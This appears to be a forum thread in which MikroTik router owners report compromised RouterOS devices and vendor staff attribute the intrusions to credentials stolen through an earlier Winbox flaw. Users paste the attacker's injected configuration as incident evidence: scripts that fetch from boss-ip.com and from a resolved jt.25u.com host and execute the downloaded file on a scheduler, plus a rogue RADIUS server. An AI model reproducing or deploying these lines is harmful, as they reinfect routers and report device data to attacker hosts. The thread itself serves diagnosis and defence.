Hi to all, a client called me than something going wrong on his 1009 router which is running on latest 6.42.3 version.
By logging in i found two dumpded files on files directory and lot of changes in configuration
Any ideas???
Did you set a (strong) password on the device?
What is the firewall config?
Which services are enabled?
Is there any information in the log?
At least send your findings with supout.rif to support@mikrotik.com.
Your story sounds similar to that of my own!.
i seen one of my servers go offline which was depending on a nat filter to get it’s proper external static ip.
what ever it is. goes in and adds: new admin users, ppp radius connections, ip pools, scripts, masquerade rules to run every now and again and on startup which verifies the infection of the device re infects it if not infected and from what i can tell uploads it.. somewhere…not sure how its getting in but it’s nasty,
i checked another Tick i know of and it was also affected…
to no coincidence i seen a service tech hanging out of the local large WISP core he looked to be doing some “maintenance”
below are some configs that were added by it.
this happened on RB2011 6.41.4 & 6.42.3
BST
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=bdee03097da1df40&actio\
n=upload&sncode=D26B162F4AE05A0DF07BB92B3480114A&dynamic=static\")}"
/system scheduler
add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
]=\"\") do={\r\
\n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
\n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.\
rif\r\
\n}\r\
\nexecute [/file get autosupout1.rif contents]" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-date=jan/01/1970 start-time=00:00:00
add interval=30m name=a on-event=ip policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-time=startup
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes
I had the same problem, winbox port blocked only for network provider, latest version and firmware, strong users and passwords, I noticed this on June 15 at 10pm. It is noteworthy that the services winbox and web were enabled, when I went to see, all services were enabled, users who were read permission became full. This is disappointing, there is no way to get more secure with mikrotik, one security flaw after the other, in the last 7 vulnerability patch versions.
For the last few months we have been named as vulnerable, but most of the hacks used one and the same vulnerability that was patched already last year. After that we found out about problem with Winbox that was patched on the same day and versions with patch were released on all RouterOS channels. So in total there were and were fixed two vulnerabilities. Hackers are using them again and again because many users still have not upgraded and/or fixed their configuration.
Regarding this problem in v6.42.3 - we have received few reports about this problem, but seems that simply hacker who used Winbox vulnerability in the past simply stored usernames and passwords and now was able to simply log into your router without hacking.
If you did change usernames and passwords recently while running on the latest RouterOS version and still seems that you have been hacked, then please without any hesitation contact support@mikrotik.com and provide supout file from your router (if possible, then generate file before you reboot router).
This is happening also to me. But the router is 2 hours flight away… any way to gain access again? I have it working and configuration seems to be untouched (vpn, eoip etc). It was updated to 6.41.3 exactly because of this vulnerability but it didn’t help.
Also happened to us in 4 routers, we found that the identity changed to “test” and then we saw all the changes in configuration.
Will appreciate an Official Note from Mikrotik regarding this issue…
At the moment we have not received even one report about an actual new problem.
So far problem with everyone who has contacted support was:
- Router in the past was running RouterOS version which had Winbox vulnerability that allowed hacker to download routers users database;
- Router was upgraded, but passwords were not changed and firewall allowed access to specific, enabled service/s;
- Hacker now uses passwords and usernames downloaded in the past and connects to routers in normal way even though router is upgraded.
Please make sure that your routers username and password has been changed after an upgrade to version that has Winbox vulnerability fix.
I believe 6.41.x doesn’t have any vulnerability fix. You should be using 6.40.8 (or later in 6.40.x series - none yet) or 6.42.1 or later.
So it’s not surprising that updating to 6.41.3 doesn’t help really. Why pick that one anyway? It’s a strange choice at the point in time.
Same problem here, routers updated to 6.42.3 before getting attack. We noticed it happened only if SSH service was enabled on default 22 port.
We found system identity modified to Test, a scheduled task and a new user, called Admin (with capital A)
What the he…
A. why would use the default port, the first thing I did after changing to SSH strong crypto is change the port to anything but default
B. your system may have been hacked prior to your OS change … did you also change usernames and passwords when making the OS update??
Same problem on a lot of routerOS, password really strong on any router. All the router have the last versions of packages and firmware, i’ve solved the problem changing default services port and making firewall rules more strong.
I understand we need to make security stronger by ourselfs, but if someone can access my router, running scripts etc whitout knowing the password… i think Mikrotik need to consider THIS as a problem to solve!
Did you change passwords after you upgraded to latest version?
We got hit with this 2 weeks in a row. The first time they did not change the username and password. We did.
This time we can not log back into the router although it is still passing traffic.
Identity has changed to test.
Is there a normal username and password that this exploit uses that will allow us back into the router?
Did you do a reinstall after being compromised? Winbox access can be escalated to shell access, where attackers can drop undetectable backdoors and other exploits. Changing passwords might be OK if you’re lucky and didn’t get hit by a sophisticated exploit, but reinstalling is the only truly safe option.
Same here. Identity changed to test and user/password changed. Scan comes from address 62.112.107.230 located in Russia
Please share more than “same here”… it isn’t helpful at all.
- Have you updated routeros? To which version?
- Have you changed password since this update?
- Have you limited access to Winbox ports 8291? If not, can you limit access to Winbox ports?
What do you mean by “scan”? Are there log messages indicating to brute force attack? Could you share these messages?
Besides the above, could you send a supout.rif to support@mikrotik.com with your findings?
HOW is Fixed?
We have same problems on 6.42.4
indentity changet to TEST, created scheduler to script and script is:
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=36C41FDED4E28E2E3A81E3C9415ED21D&dynamic=static") keep-result=no}
is created new user admin, and is opened SSH link from russia 
We try to make clear netinstall and set it back via export .. after few day is same situation ..
We cant limit acces via Winbox. But we have changet SSH port to other number, and allowed only www, winbox, ssh services (its Hotspot Machine)
We have received multiple reports where clients complain that their routers have been “hacked” while running RouterOS version that has Winbox vulnerability patch. In each and every of these cases RouterOS usernames and passwords were not changed or were changed before an upgrade - not after it. Hacker who stole access credentials simply goes through the hacked routers (while running old version) and uses the same username and password. This means that hacker logs into router as a normal user.
- Upgrade RouterOS
- Change usernames and/or passwords after an upgrade (not before)
- Protect device with firewall configuration
If your device has been accessed by unknown user while running on the latest RouterOS version even if access credentials for all users have been changed, then please report to support@mikrotik.com as soon as possible.